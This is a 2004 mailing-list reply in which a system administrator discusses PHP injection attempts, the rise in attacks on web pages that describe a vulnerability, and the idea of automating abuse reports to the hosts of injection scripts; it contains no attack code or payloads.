Re: PHP injection attempt from 200.222.244.154

[Jez Hancock <jez.hancock () gmail com>]

On Mon, 22 Nov 2004 20:09:22 -0600, Kirby Angell <kangell () alertra com> wrote:
> Haha... note to self, do not include the actual attack URL in the
> message.  Judging from this referer:
>
> Referer:
> http://gmail.google.com/gmail?view=cv&search=inbox&th=10063111e32eb17b&lvp=-1&cvp=0&zx=18acabd2b173f0d8528652499
>
> I'd say someone got my message from this list and then clicked on the
> URLs  :-)

That's something I noticed - I only started to get injection attempts
on some URLs once that URL began to have content about the particular
injection technique/vulnerability.

For example in one weblog article I discussed the myegallery
vulnerability and within a week or so I noticed a massive increase in
the number of attacks on that article trying to employ injection
techniques to exploit the hole the article talked about!  I'd not
noticed any search engines in the referer logs, but just presumed this
was how the attack was being seeded.  Such a waste of bandwidth.

I'd thought about doing something similar to KEM Hosting's script
above regarding turning tables or automating in some how an abuse
complaint procedure.  For a while I started to notify the owners of
domains that were hosting the injection scripts that they possibly had
a problem, but this got tedious quite quickly.  Automating the
procedure by intercepting the requests for bad URIs and redirecting
them to a script that drafts together an abuse report might be
interesting and save some time though.

-- 
Jez Hancock
 - System Administrator / PHP Developer

http://munk.nu/
http://freebsd.munk.nu/      - A FreeBSD Diary
http://ipfwstats.sf.net/        - ipfw peruser traffic logging